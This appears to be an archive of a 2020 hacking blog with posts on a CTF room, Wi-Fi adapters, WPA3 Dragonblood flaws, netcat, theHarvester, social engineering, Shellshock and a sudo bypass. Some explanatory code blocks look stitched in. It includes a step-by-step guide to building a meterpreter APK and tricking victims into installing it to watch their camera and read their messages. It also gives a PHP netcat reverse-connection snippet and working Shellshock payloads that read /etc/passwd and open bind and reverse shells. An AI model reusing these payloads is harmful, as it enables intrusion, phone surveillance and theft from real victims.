Tuesday, September 15, 2020

TryHackMe CMesS


First Scanning:

I use both nmap and rustscan (if you don't know about rustscan, it's nmap -p- on steroids):

nmap -sC -sV --min-parallelism 64 -oN nmap/nmapfile $target-ip

Rustscan didn't give anything new.

Checking if the website has any sub-domains:

wfuzz -c -f sub-fighter -w wordlist.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm" -hw 290


Target: http://cmess.thm/

Total requests: 4997

==================================================================

ID    Response   Lines      Word         Chars          Request    

==================================================================

00019:  C=200     30 L      104 W     934 Ch   "dev"


Total time: 0

Processed Requests: 2990

Filtered Requests: 2989

Requests/sec.: 0



Used gobuster for hunting down hidden directories, but no luck.
Check out the subdomain; there is some good stuff there.



Got into the CMS of the website:

Now the hint is to find which CMS the website is using and run it through searchsploit.
+ found a local file inclusion
+ go to exploit-db; now you know where to go


That's all for the initial hints. If you really want to see what I did, go to my GitHub page and enter the user flag (don't bruteforce it).

https://gitlab.com/jdp1369/THM_CMesS.git

Monday, August 31, 2020

Wi-Fi Attacks Pre-Requisites

 

There are any number of ways to compromise a Wi-Fi router, but generally you can't attack it directly because your system's built-in Wi-Fi module does not support monitor mode and packet injection. Also, if you are using a virtual Kali machine to perform a Wi-Fi attack, you will be unable to do so because virtualization generally uses a NAT (Network Address Translation) network, which creates a subnet inside your machine where your host operating system acts as a router to the VMs (virtual machines), so you don't really have direct access to the real router.

What is Monitor Mode and Packet Injection?

Monitor Mode: also called RFMON (Radio Frequency MONitor) mode, it allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received on a wireless channel. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with an access point or ad hoc network first. Monitor mode only applies to wireless networks, while promiscuous mode can be used on both wired and wireless networks. Monitor mode is one of the eight modes that 802.11 wireless cards can operate in: Master (acting as an access point), Managed (client, also known as station), Ad hoc, Repeater, Mesh, Wi-Fi Direct, TDLS and Monitor mode.

Packet Injection: also known as forging or spoofing packets in computer networking, it is the process of interfering with an established network connection by constructing packets that appear to be part of the normal communication stream. Packet injection allows an unknown third party to disrupt or intercept packets between the consenting parties that are communicating, which can lead to degradation or blockage of users' ability to use certain network services or protocols. Packet injection is commonly used in man-in-the-middle attacks and denial-of-service attacks.

What's the solution?

The solution is to use a new Wi-Fi module which supports monitor mode and packet injection; this is only viable if you are not using Kali Linux as a VM. If you are using it as a VM, use an external Wi-Fi adapter.

Which adapter to choose?

Actually, the brand does not really matter that much here; what you should be looking for is the correct chipset. Brands like Alfa have better injection rates and fewer failures than locally made adapters, but in my opinion the chipset is the only thing that matters if you have just started learning and attempting Wi-Fi attacks.

The following chipsets are the ones to look for in a Wi-Fi adapter:
  1.  Atheros AR9271: only capable of attacking a router working on the 2.4GHz band.
  2.  Realtek RTL8812AU: capable of attacking on both the 2.4GHz and 5GHz bands.
  3.  Ralink 3070/2870: supports the 2.4GHz band, but I don't trust this chipset.

Some products which I or my friend have used:

 

  • Alfa AWUS036NHA [b/g/n USB]
  • Alfa AWUS036ACH (a/b/g/n/ac): the best performing card, but the driver can be unstable enough to crash your kernel
  • Alfa AWUS036ACM (a/b/g/n/ac): the highest performing of the STABLE devices, but it requires kernel 4.19.5 or higher, and the driver doesn't work on the Raspberry Pi yet
  • TP-Link TL-WN722N v1 (b/g/n) [NOTE: only the gen1, not the gen2]
  • Ubiquiti SRX [a/b/g Cardbus]
  • Ubiquiti SRC [a/b/g ExpressCard]
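Before buying anything, check what the adapter you already have advertises. The following is an added example (not from this post): it parses the "Supported interface modes" section of `iw list` output and reports which PHYs offer monitor mode. The sample output is constructed, and `check_local_adapters` assumes the `iw` tool is installed.

```python
import re
import subprocess

# Constructed excerpt of `iw list` output for two PHYs (not captured from a real
# adapter); the mode names are the ones nl80211 reports.
SAMPLE_IW_LIST = """\
Wiphy phy0
        Supported interface modes:
                 * IBSS
                 * managed
                 * AP
                 * AP/VLAN
                 * monitor
                 * P2P-client
                 * P2P-GO
        Band 1:
                Capabilities: 0x1862
Wiphy phy1
        Supported interface modes:
                 * managed
        Band 1:
                Capabilities: 0x1862
"""

def supported_modes(iw_list_output: str) -> dict:
    """Map each PHY name to the interface modes listed under
    'Supported interface modes:'. Mode lines are the '* name' bullets that
    follow the heading; the first non-bullet line ends the section."""
    modes, phy, in_modes = {}, None, False
    for line in iw_list_output.splitlines():
        m = re.match(r"Wiphy (\S+)", line)
        if m:
            phy, in_modes = m.group(1), False
            modes[phy] = []
            continue
        if "Supported interface modes:" in line:
            in_modes = True
            continue
        if in_modes:
            bullet = re.match(r"\s*\*\s+(.+?)\s*$", line)
            if bullet and phy is not None:
                modes[phy].append(bullet.group(1))
            else:
                in_modes = False
    return modes

def phys_with_monitor_mode(iw_list_output: str) -> list:
    """PHYs that advertise monitor mode (capture without associating)."""
    return [phy for phy, m in supported_modes(iw_list_output).items() if "monitor" in m]

def check_local_adapters() -> list:
    """Run `iw list` on this host and report the PHYs that support monitor mode."""
    out = subprocess.run(["iw", "list"], capture_output=True, text=True, check=True).stdout
    return phys_with_monitor_mode(out)

if __name__ == "__main__":
    print(phys_with_monitor_mode(SAMPLE_IW_LIST))   # sample data: ['phy0']
```

Note that `iw` only reports the interface modes; packet injection is a driver property that it does not list, so that still has to be tested separately with the driver loaded.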

Where can you buy these things?

You can buy these from Amazon, AliExpress and other well-known online retailers, but for some locally made adapters you can check out your nearby computer market and ask about adapters with monitor mode and packet injection. You can also find some adapters on Zsecurity.

link to buy from amazon India : https://amzn.to/2PsoBiw
  

Ask in the comment section if you have any doubts regarding the hardware.


Saturday, August 29, 2020

Dragonblood: WPA3 Flaws

As we know, WPA2 has been the latest and greatest in terms of Wi-Fi security for a long time now; you might also have already heard or read about WPA3 and how it's going to replace WPA2 because it's more secure.


But in mid-April 2019 researchers Mathy Vanhoef and Eyal Ronen published a research paper in which they analysed the Dragonfly handshake, the handshake used in WPA3 to replace the vulnerable 4-way handshake of WPA. In this paper they detailed a number of flaws that can be used to launch attacks against the latest and greatest Wi-Fi security protocol, WPA3.

What are the potential threats created by these flaws?
The major ones are as follows:
  1. Recovering the network key
  2. Downgrading security (WPA3 to WPA2)
  3. Launching DoS attacks

In their research paper "Dragonblood: Analyzing the Dragonfly Handshake of WPA3 and EAP-pwd" they mention that one of the supposed advantages of WPA3 was that it is more secure than WPA2: thanks to its underlying Dragonfly handshake, it should be near impossible to crack the network key/password. But they found that even with WPA3, an attacker within range of the victim can still recover the password.

The following CVEs were allocated for these newly found vulnerabilities:
  1. CVE-2019-13377: Timing-based side-channel attack against WPA3's Dragonfly handshake when using Brainpool curves.
  2. CVE-2019-13456: Information leak in FreeRADIUS' EAP-pwd due to aborting when needing more than 10 iterations.

DETAILS

Flaws in WPA3


The design flaws discovered can be divided into 2 categories. The first category consists of downgrade attacks against WPA3-capable devices, and the second consists of weaknesses in the Dragonfly handshake of WPA3, which in the Wi-Fi standard is better known as the SAE (Simultaneous Authentication of Equals) handshake. The discovered flaws can be abused to recover the password of the Wi-Fi network, launch resource consumption attacks, and force devices into using weaker security groups.
The following vulnerabilities were found in WPA3:

  1. CERT ID #VU871675: Downgrade attack against WPA3-Transition mode leading to dictionary attacks.
  2. CERT ID #VU871675: Security group downgrade attack against WPA3's Dragonfly handshake.
  3. CVE-2019-9494: Timing-based side-channel attack against WPA3's Dragonfly handshake.
  4. CVE-2019-9494: Cache-based side-channel attack against WPA3's Dragonfly handshake.
  5. CERT ID #VU871675: Resource consumption attack (i.e. denial of service) against WPA3's Dragonfly handshake.


Flaws in EAP-pwd

The EAP-pwd protocol internally also uses Dragonfly, and provides authentication based on a username and password in certain enterprise Wi-Fi networks. It is vulnerable to the same attacks that were discovered against WPA3. On top of that, all the EAP-pwd implementations the researchers tested were vulnerable to invalid curve attacks, which enable an adversary to completely bypass authentication. Most implementations were also vulnerable to reflection attacks.

The following vulnerabilities were found in the EAP-pwd implementations:

  1. CERT ID #VU871675: Overview of attacks specific to hostapd and wpa_supplicant (does not cover other implementations).
  2. CVE-2019-9495: Cache-based side-channel attack against the EAP-pwd implementation of hostapd and wpa_supplicant.
  3. CVE-2019-9497: Reflection attack against the EAP-pwd implementation of hostapd and wpa_supplicant.
  4. CVE-2019-9498: Invalid curve attack against the EAP-pwd server of hostapd resulting in authentication bypass.
  5. CVE-2019-9499: Invalid curve attack against the EAP-pwd client of wpa_supplicant resulting in server impersonation.
  6. CVE-2019-11234: Reflection attack against the EAP-pwd implementation of FreeRADIUS.
  7. CVE-2019-11235: Invalid curve attack against the EAP-pwd server of FreeRADIUS resulting in authentication bypass.


Tools
These tools are not designed to attack your neighbor's WPA3 network:

  • Dragonslayer: performs invalid curve attacks against EAP-pwd clients and servers. These attacks bypass authentication: an adversary only needs to possess a valid username.
  • Dragondrain: this tool can be used to test whether, or to what extent, an access point is vulnerable to denial-of-service attacks against WPA3's SAE handshake.
  • Dragontime: this is an experimental tool to perform timing attacks against the SAE handshake if MODP group 22, 23, or 24 is supported. Note that most WPA3 implementations do not enable these groups by default.
  • Dragonforce: this is an experimental tool which takes the information recovered from the timing or cache-based attacks and performs a password partitioning attack. This is similar to a dictionary attack.


In practice the main risks for WPA3 are downgrade attacks, and possible timing attacks against resource-constrained devices. The authentication bypass attacks against EAP-pwd that are implemented in Dragonslayer are also security critical in practice. Considering the other attacks are non-trivial in practice, and assuming vendors will implement defenses against them, we expect that your neighbour won't abuse them to attack you. 
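To see why a timing leak in the handshake matters, here is an added toy model (not from the paper or this post) of Dragonfly's hunting-and-pecking loop: the early-abort MODP-style loop, whose round count depends on the password and the MAC addresses, next to a constant-round version that removes that dependency, plus a function that counts how many dictionary candidates a leaked round count still leaves. The group (p = 503, q = 251), the 10-bit seed width and all MAC/password inputs are constructed for the demo and bear no resemblance to real group sizes.

```python
import hashlib
import hmac

# Toy FFC (MODP-style) group p = 2q + 1, constructed for this demo. Like the real
# MODP groups 22-24 that Dragontime targets, p does not have all of its top bits
# set: only 503 of the 1024 possible 10-bit seeds fall below p, so the
# "seed >= p" skip in hunting-and-pecking fires on roughly half of the rounds.
P = 503
Q = 251
SEED_BITS = 10
K_ROUNDS = 40   # fixed round count, as in the standard's constant-round ECC loop

def pwd_seed(password: str, mac_a: str, mac_b: str, counter: int) -> int:
    """Dragonfly-style seed: HMAC keyed with both MAC addresses (larger first)
    over password || counter, truncated to SEED_BITS bits for the toy group."""
    key = (max(mac_a, mac_b) + min(mac_a, mac_b)).encode()
    digest = hmac.new(key, password.encode() + bytes([counter]), hashlib.sha256).digest()
    return int.from_bytes(digest[:2], "big") >> (16 - SEED_BITS)

def candidate_element(password, mac_a, mac_b, counter):
    """Element for this round, or None when the seed is >= p or maps to 1."""
    seed = pwd_seed(password, mac_a, mac_b, counter)
    if seed >= P:
        return None
    elem = pow(seed, (P - 1) // Q, P)
    return elem if elem > 1 else None

def hunt_and_peck_leaky(password, mac_a, mac_b):
    """Early-abort loop as in the MODP variant: returns (element, rounds_used).
    The round count depends on the password and the MACs, so timing leaks it."""
    for counter in range(1, 256):
        elem = candidate_element(password, mac_a, mac_b, counter)
        if elem is not None:
            return elem, counter
    raise ValueError("no password element found")

def hunt_and_peck_fixed(password, mac_a, mac_b):
    """Constant-round loop: always performs K_ROUNDS rounds and keeps the first
    hit, so the work done no longer depends on the password."""
    found = None
    for counter in range(1, K_ROUNDS + 1):
        elem = candidate_element(password, mac_a, mac_b, counter)
        if found is None and elem is not None:
            found = elem
    if found is None:
        raise ValueError("no password element found")
    return found, K_ROUNDS

def consistent_candidates(candidates, observations):
    """Quantify the leak: keep the candidate passwords whose leaky round count
    matches every observed (mac_a, mac_b, rounds) measurement."""
    return [pw for pw in candidates
            if all(hunt_and_peck_leaky(pw, a, b)[1] == n for a, b, n in observations)]

if __name__ == "__main__":
    ap, sta = "00:11:22:33:44:55", "66:77:88:99:aa:bb"   # constructed MACs
    for pw in ("pw1", "pw2", "pw3"):
        print(pw, "leaky rounds:", hunt_and_peck_leaky(pw, ap, sta)[1],
              "fixed rounds:", hunt_and_peck_fixed(pw, ap, sta)[1])
```

Each leaked round count keeps only the candidates that produce the same count for that MAC pair, which is the partitioning idea behind Dragonforce; the constant-round loop gives every password the same count and so leaks nothing through this channel.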


Content Reference :

Tuesday, August 25, 2020

Breaking into android

  




Hello all. As we know, a large part of society is using smartphones without knowing the adverse effects on their privacy. So today I am going to teach you how to hack Android devices with the Metasploit framework from a different network.

After getting a meterpreter session the attacker can do many things, such as:
  • access the camera's live stream.
  • take screenshots of the mobile display.
  • read messages.
  • call from the victim's number.
  • get the GPS location.
  • attack other devices, etc.
PRE-REQUIREMENTS:
  1. Kali OS
  2. Updated Metasploit Framework.
  3. Social Engineering.
This blog is for educational purposes only and is not responsible for illegal activities.

1. Get the IP address of your network.
For this, enter the following command in the terminal:

  • ifconfig

As you can see, my IP address is 192.168.23.168; yours may be different.

2. Expose your local host on the internet by port forwarding through serveo.net.
 syntax:   ssh -R src_port:ip_address:dest_port serveo.net
example
  • ssh -R 8565:192.168.23.168:4444 serveo.net

This forwards connections arriving at serveo.net on port 8565 to port 4444 on your IP address.

3. Make a payload using msfvenom.
  • msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=8565 -o payload.apk 
4. Open a listener to get the meterpreter session.
type:
  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp 
  • set lhost ip-add
  • set lport 4444
  • run
5. Social engineering
Send payload.apk to the victim by any means and get it installed on the victim's Android phone.
Once it is installed and opened by the victim, the meterpreter session is established as shown below.

6. Exploit
type:
  • help
As you can see, all the commands are listed; you can do whatever you want.



Example:
I want the victim camera's live stream.
type
  • webcam_list // this gives you the list of webcams present on the victim machine.
  • webcam_stream 1 // this gives you the live stream as shown below.



Sunday, August 23, 2020

Using netcat for hacking

 





Netcat is a great network utility for reading from and writing to network connections using the TCP and UDP protocols. Netcat is often referred to as the Swiss army knife of networking tools, and we will be using it a lot throughout the different tutorials on Hacking Tutorials. The most common uses for Netcat when it comes to hacking are setting up reverse and bind shells, piping and redirecting network traffic, port listening, debugging programs and scripts, and banner grabbing. In this tutorial we will be learning how to use the basic features of Netcat such as:


  1. Banner grabbing
  2. Webserver interaction
  3. File transfers

Banner Grabbing


Service banners are often used by system administrators for inventory taking of systems and services on the network. The service banners identify the running service and often the version number too. Banner grabbing is a technique to retrieve this information about a particular service on an open port and can be used during a penetration test for performing a vulnerability assessment. When using Netcat for banner grabbing you actually make a raw connection to the specified host on the specified port. When a banner is available, it is printed to the console. Let’s see how this works in practice.

The following command is used to grab a service banner (make a raw connection to a service):


  • nc [ip address] [port]

Let’s try this on the FTP service on Metasploitable 2 which is running on port 21:

  • nc 192.168.100.100 21







Web server interaction


Netcat can also be used to interact with webservers by issuing HTTP requests. With the following command we can grab the banner of the web service running on Metasploitable 2:


  • nc 192.168.100.108 80


And then run this HTTP request:

HEAD / HTTP/1.0





Apache webserver banner.

The webserver responds with the server banner: Apache/2.2.8 (Ubuntu) DAV/2 and the PHP version.

To retrieve the top level page on the webserver we can issue the following command:


  • nc 192.168.100.108 80


And then run this HTTP request:

GET / HTTP/1.0
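The same HEAD exchange as a script, added here as an example that is not part of the original post: `send_raw` does what `nc host port` does, `parse_http_head` splits the reply into status line and headers, and `service_banner` pulls out what the server disclosed. The sample response is constructed in the shape of the Metasploitable 2 reply above; the PHP version string is a placeholder.

```python
import socket

# The request typed into netcat on the page, as raw bytes.
HEAD_REQUEST = b"HEAD / HTTP/1.0\r\n\r\n"

def send_raw(host: str, port: int, payload: bytes = b"", timeout: float = 5.0) -> bytes:
    """Open a raw TCP connection like `nc host port`, optionally send a payload
    (nothing for plain banner grabbing) and return what the service writes back."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        if payload:
            sock.sendall(payload)
        chunks = []
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass          # quiet service: keep whatever arrived before the timeout
    return b"".join(chunks)

def parse_http_head(raw: bytes) -> dict:
    """Split a raw HTTP response into its status line and a header dict
    (names lower-cased, values stripped); the body, if any, is ignored."""
    head = raw.decode("latin-1").split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"status": lines[0], "headers": headers}

def service_banner(parsed: dict) -> str:
    """Summarise what the server disclosed about itself: Server and X-Powered-By."""
    headers = parsed["headers"]
    parts = [headers.get("server", "<no Server header>")]
    if "x-powered-by" in headers:
        parts.append(headers["x-powered-by"])
    return " | ".join(parts)

def grab_web_banner(host: str, port: int = 80) -> str:
    """Equivalent of `nc host 80` followed by typing `HEAD / HTTP/1.0`."""
    return service_banner(parse_http_head(send_raw(host, port, HEAD_REQUEST)))

# Constructed response in the shape the Metasploitable 2 Apache returns; the
# PHP version string is a placeholder, not the value from the page's screenshot.
SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Date: Tue, 25 Aug 2020 10:00:00 GMT\r\n"
                   b"Server: Apache/2.2.8 (Ubuntu) DAV/2\r\n"
                   b"X-Powered-By: PHP/<version-placeholder>\r\n"
                   b"Connection: close\r\n"
                   b"Content-Type: text/html\r\n\r\n")

if __name__ == "__main__":
    print(service_banner(parse_http_head(SAMPLE_RESPONSE)))
```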






File transfers with Netcat


In this example we will be using a Netcat connection to transfer a text file. Let's assume we have remote command execution on the target host and we want to transfer a file from the attack box to the host. First we need to set up a listener on the target host and connect to it from the attack box. We will be using port 8080 for this purpose, and we save the file to the desktop:


  • nc -lvp 8080 > /root/Desktop/transfer.txt

On the attack box we connect to port 8080 and send a file named transfer.txt:

  • nc 192.168.100.107 8080 < /root/Desktop/transfer.txt



Netcat reverse connection


This is used in system hacking and web server hacking, and it can also be injected into a PHP file that the server processes.

Example
  • <?php
  • system("nc 192.168.100.107 8080");
  • ?>

This gives you a connection back on port 8080.

You can then listen for it on your system with:

  • nc -l -p 8080

Saturday, August 22, 2020

The Harvester

'theHarvester' is a tool designed to be used in the information gathering phase of a penetration test.




theHarvester is a tool used to harvest/gather sensitive information that can help in determining a company's external threat landscape on the internet. Not just a company's: it can also gather information about individual users that is available on the internet. 'theHarvester' largely depends on public sources, and the following information can be gathered:
  • Emails
  • Names
  • Subdomains
  • IPs
  • URLs
  • VirtualHosts
  • Even Port Scanning

theHarvester public sources

One of the interesting things about 'theHarvester' is that it supports more than one public source to harvest information from. More than 20 public sources are supported by the tool.
The public sources that require an API key include:
  • SecurityTrails
  • Hunter
  • GitHub
  • Shodan
  • bingapi
  • Spyse
  • Intelx
But if you don't have an API key you can still use the other public sources.

theHarvester on Ubuntu or other Linux-based systems where it is not preinstalled

You just need some major dependencies on the system, in particular Python 3.6+. Some of its major dependencies include:
⦁ Python 3.7+
⦁ python3 -m pip install pipenv
⦁ pipenv install


virtualenv -p python3 theharvester

git clone https://github.com/laramies/theHarvester.git

source theharvester/bin/activate

Thursday, August 20, 2020

Social Engineering

Spent millions of dollars and still got hacked, while your servers ran the latest security updates and patches and were completely hardened? Then it might have been a social engineering attack.


Remember the movie "Catch Me If You Can"? Frank Abagnale Jr. used social engineering through almost the whole movie.

There is no single security mechanism or technical measure that can prevent the social engineering techniques used by attackers. Only educating employees on how to recognize and respond to social engineering attacks can minimize the attackers' chances of success. Before going ahead with this module, let's first discuss various social engineering concepts.

 

What is Social Engineering?

Social engineering is the art of convincing people to reveal confidential information.
Common targets of social engineering include help desk personnel, technical support executives, system admins, etc.
Social engineering depends on the fact that people are unaware of the value of their information and are careless about protecting it.

Impact of an Attack on an Organization
  1. Economic losses
  2. Damage to goodwill
  3. Loss of privacy
  4. Dangers of terrorism
  5. Lawsuits and arbitration
  6. Temporary or permanent closure
Factors that Make Companies Vulnerable to Attacks
  • Insufficient security training
  • Unregulated access to information
  • Several organizational units
  • Lack of security policies
Why is Social Engineering Effective?
  • Security policies are only as strong as their weakest link, and humans are the most susceptible factor
  • It is difficult to detect social engineering attempts
  • There is no method that can be applied to ensure complete security from social engineering attacks
  • There is no specific software or hardware for defending against a social engineering attack
Phases of a Social Engineering Attack
  • Research on the Target Company {dumpster diving, websites, employees, touring the company, etc.}
  • Select the Victim {identify frustrated employees of the target company}
  • Develop a Relationship {with the victim in order to gain their trust}
  • Exploit the Relationship {collect sensitive account and financial information, and details of current technologies}
Types of Social Engineering
  • Human-based Social Engineering:
>>> Gathers sensitive information through interaction
>>> Techniques: Impersonation, Vishing, Shoulder Surfing, Reverse Social Engineering, Dumpster Diving, Piggybacking, etc.
  • Computer-based Social Engineering:
>>> Social engineering carried out with the help of computers
>>> Techniques: Phishing, Spam Mail, Pop-up Window Attack, Instant Chat Messenger
  • Mobile-based Social Engineering:
>>> Carried out with the help of mobile applications
>>> Techniques: Publishing Malicious Apps, Repackaging Legitimate Apps, Using Fake Security Applications, SMiShing (SMS Phishing)
   

 

Monday, August 17, 2020

CVE-2014-6271/Shellshock

In this blog we are going to discuss the CVE-2014-6271 Shellshock vulnerability.


This Vulnerability impacts the Bourne Again Shell aka "Bash". Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface aka "CGI".


About the Vulnerability

Here we are going to focus on the first version of the vulnerability, but many more vulnerabilities in the same part of Bash have been found since: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, and others.

The source of the issue is that Bash can carry internal function declarations in its environment variables. The first version of the vulnerability is related to the ability to run arbitrary commands placed after such a function declaration.

First, the environment variable's value declares a function using (). Then comes an empty function body. Finally, the command to run is appended after the function declaration. More details can be found in the following email on oss-sec.

Apache uses environment variables to pass headers to the CGI. Since it's a Bash-based CGI, an attacker can run arbitrary commands by declaring an empty function and adding a command after this declaration.

What is CGI?

CGI (Common Gateway Interface) is a standard way of running programs from a web server. Often, CGI programs are used to generate pages dynamically or to perform some other action when someone fills out an HTML form and clicks the submit button.

When a user sends a request, it usually needs to be processed by an application program. The web server typically passes the form information to a small application program that processes the data and may send back a confirmation message. This method, or convention, for passing data back and forth between the server and the application is called CGI. It is part of the Web's HTTP (Hypertext Transfer Protocol).

So if you are creating a website and want a CGI application to take control, you specify the name of the application in the URL (Uniform Resource Locator) that you code in the HTML file. This URL can be specified as part of the FORM tag if you are creating a form. For example, you might use the following:

<FORM METHOD=POST ACTION=http://www.somewebsite.com/cgi-bin/formprog.rb>

and the server at "somewebsite.com" would pass control to the CGI application called "formprog.rb" to record the entered data and return a confirmation message.

NOTE: .rb indicates the Ruby language.


The Common Gateway Interface provides a consistent way for data to be passed from the user's request to the application program and back to the user. This means that the person who writes the application program can make sure it gets used no matter which operating system the server uses (PC, Macintosh, UNIX, OS/390, or others). It's simply a basic way for information about your request to be passed from the web server to the application program and back again.

Because the interface is consistent, a programmer can write a CGI application in a number of different languages. The most popular languages for CGI applications are C, C++, Java, and Perl.

An alternative to a CGI application is Microsoft's Active Server Page (ASP), in which a script embedded in a Web page is executed at the server before the page is sent.


Fingerprinting

By visiting the application through a proxy (Burp Suite or OWASP ZAP), we can see that multiple URLs are accessed when the page is loaded.

To exploit "Shellshock", we need to find a way to "talk" to Bash. This implies finding a CGI that runs through Bash. CGIs commonly use Python or Perl, but on old servers it's common to find CGIs written in shell or even C (newer ones are generally written in Microsoft's ASP).

How does CGI work?


When you call a CGI, the web server (Apache here) will start a new process and run the CGI. Here it will start a Bash process and run the CGI script.

Apache needs to pass information to the CGI script. To do so, it uses environment variables, which are available inside the CGI script. This allows Apache to easily pass every header (among other information) to the CGI. If you have an HTTP header named Blah in your request, you will have an environment variable named HTTP_BLAH available in your CGI.

Tips to check for the vulnerability

You can quickly test this by replacing the call to "uptime" with a call to "env" in the CGI. Then, if you call your script with arbitrary headers, you should see them in the page.

Being hackers, let's talk about exploitation

Here we can use a tool known as netcat, or you can write your own listener in any programming language. If you want to know how to write such code, please mention it in the comment section. We can also exploit this vulnerability using a proxy with a repeater mode (or netcat).

Multiple payloads can be used depending on what you want to achieve. You can start by reading arbitrary files using the following payload:



$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: target\r\nConnection: close\r\n\r\n" | nc target 80

The above payload reads the content of /etc/passwd and echoes it in the response, sent over port 80.

NOTE: You will need to inspect the HTTP headers of the response to see the file's content.
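For the defensive side of the header-to-environment mapping described above and of the payload shape just shown, here is an added example (not from this post): it reproduces the HTTP_BLAH naming, flags any header in a raw request whose value Bash would parse as a function definition, and runs the standard exported-variable check against the local bash to confirm it is patched. The sample request is constructed and carries the page's payload.

```python
import os
import re
import subprocess

# A header value that begins with an empty Bash function definition, such as
# "() { :;}; <command>", is the signature of a Shellshock probe.
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{")

def cgi_env_name(header_name: str) -> str:
    """Mirror how the web server hands a request header to a CGI script:
    'User-Agent' becomes HTTP_USER_AGENT and 'Blah' becomes HTTP_BLAH."""
    return "HTTP_" + header_name.strip().upper().replace("-", "_")

def find_shellshock_headers(raw_request: str) -> list:
    """Return (env_var_name, value) for every header of a raw HTTP request whose
    value a vulnerable Bash would parse as a function definition."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    hits = []
    for line in head.split("\r\n")[1:]:      # skip the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        if SHELLSHOCK_RE.match(value):
            hits.append((cgi_env_name(name), value.strip()))
    return hits

def local_bash_vulnerable():
    """Patch check for this host: a vulnerable Bash runs the command that follows
    the function body of an exported variable. Returns True, False, or None
    when bash is not available."""
    env = dict(os.environ, SHELLSHOCK_CHECK="() { :;}; echo VULNERABLE")
    try:
        result = subprocess.run(["bash", "-c", "echo test"], env=env,
                                capture_output=True, text=True, timeout=5)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return "VULNERABLE" in result.stdout

# Constructed request carrying the page's file-read payload in User-Agent.
SAMPLE_REQUEST = ("HEAD /cgi-bin/status HTTP/1.1\r\n"
                  "User-Agent: () { :;}; echo $(</etc/passwd)\r\n"
                  "Host: target\r\n"
                  "Connection: close\r\n\r\n")

if __name__ == "__main__":
    print(find_shellshock_headers(SAMPLE_REQUEST))
    print("local bash vulnerable:", local_bash_vulnerable())
```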


Bind Shell

If you want to run commands, the easiest way is to bind a shell. Basically you need netcat (nc) to listen on a port and redirect its input and output to /bin/sh or /bin/bash:

$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: target\r\nConnection: close\r\n\r\n" | nc vulnerable 80

NOTE: Here the path to netcat/nc is given. On a real system you will have to brute force it, and it may not be installed. Here we are targeting /bin/sh, and the request is sent over port 80.


Bind shells suffer from a huge limitation: it's likely that a firewall between you and your victim will prevent you from connecting to the port you just bound. To bypass this, we are going to get the server to connect back to us.

Gaining a Reverse Shell


We want the server to connect back to us. To do so, we first bind a port on our system. We want a port that the server is likely to have access to; the most common are 21 (FTP), 53 (DNS), 123 (NTP), 80 (HTTP) and 443 (HTTPS), as they are probably used to keep the system up to date and to perform everyday operations.

We are going to bind port 443 (you will need to run this command as root or using sudo) and send the following command:

$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc ipAddress 443 -e /bin/sh\r\nHost: target\r\nConnection: close\r\n\r\n" | nc vulnerable 80

By going back to our initial netcat, we can now type commands locally and they will be run on the compromised system.

Saturday, August 15, 2020

Bypassing sudo command: CVE-2019-14287

As the title says, the "sudo" command in Linux can be bypassed. If you are not familiar with the Linux operating system, let me tell you what the sudo command is.


sudo is a program for Unix- and Linux-like computer operating systems that allows a user to run programs with the security privileges of another user, by default the superuser, much like installing software on Windows using Admin privileges. sudo originally stood for "superuser do".

According to sudo's own description, sudo allows a permitted user to execute a command as the superuser or another user, as specified by the security policy. The invoking user's real (not effective) user ID is used to determine the user name with which to query the security policy.
sudo supports a plugin architecture for security policies and input/output logging. Third parties can develop and distribute their own policy and I/O logging plugins to work seamlessly with the sudo front end. The default security policy is sudoers, which is configured via the file /etc/sudoers, or via LDAP.

For more information just type the following command in any Linux terminal:
man sudo

Description
A flaw was found in the way sudo implemented running commands with an arbitrary user ID. If a sudoers entry is written to allow the attacker to run a command as any user except root, this flaw can be used by the attacker to bypass that restriction.

Statement
This flaw only affects a specific, non-default configuration of sudo, in which a sudoers configuration entry allows a user to run a command as any user except root, for example:
-------------------------------------------------------------------------
someuser myhost = (ALL, !root) /usr/bin/somecommand
-------------------------------------------------------------------------

This config allows user "someuser" to run somecommand as any other user except root. However, this flaw also allows someuser to run somecommand as root by specifying the target user using the numeric ID of -1. Only the specified command can be run; this flaw does not allow the user to run commands other than those specified in the sudoers configuration.

Any other configurations of sudo (including configurations that allow a user to run commands as any user including root, and configurations that allow a user to run a command as a specific other user) are NOT affected by this flaw.


 

Mitigation 

This vulnerability only affects configurations of sudo that have a "runas" user list that includes an exclusion of root. The simplest example is:

--------------------------------------------------------------------------------------
someuser ALL=(ALL, !root) /usr/bin/somecommand
--------------------------------------------------------------------------------------
The exclusion is specified using an exclamation mark (!). In this example, the "root" user is specified by name. The root user may also be identified in other ways, such as by UID (user ID):
---------------------------------------------------------------------------------------
someuser ALL=(ALL, !#0) /usr/bin/somecommand
---------------------------------------------------------------------------------------
or by reference to a runas alias:
--------------------------------------------------------------------------------------
Runas_Alias MYGROUP = root, adminuser
someuser ALL=(ALL, !MYGROUP) /usr/bin/somecommand
--------------------------------------------------------------------------------------

To ensure your sudoers configuration is not affected by this vulnerability, we recommend examining each sudoers entry that includes the `!` character in the runas specification, to ensure that the root user is not among the exclusions. These can be found in the /etc/sudoers file or files under /etc/sudoers.
